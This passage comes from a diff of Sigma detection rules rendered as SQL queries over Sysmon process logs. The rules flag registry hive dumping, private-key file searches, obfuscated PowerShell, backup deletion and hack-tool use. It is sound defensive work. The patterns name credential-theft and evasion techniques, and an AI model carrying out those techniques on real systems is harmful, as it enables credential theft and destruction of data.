(Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "title": "DirLister Execution", + "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "status": "experimental", + "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Legitimate use by users" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'DirLister.exe' OR Image LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_dirlister_execution.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Unmount Share Via Net.EXE", - "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.005" + "attack.t1036.003" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_unmount.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate administrators granting over permissive permissions to users" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" ], "falsepositives": [ - "To be determined" + "Legitimate use of debugging tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_lolbin_cdb.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", + "title": "Suspicious Network Command", + "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_susp_network_command.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "status": "test", - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Wab Execution From Non Default Location", + "id": 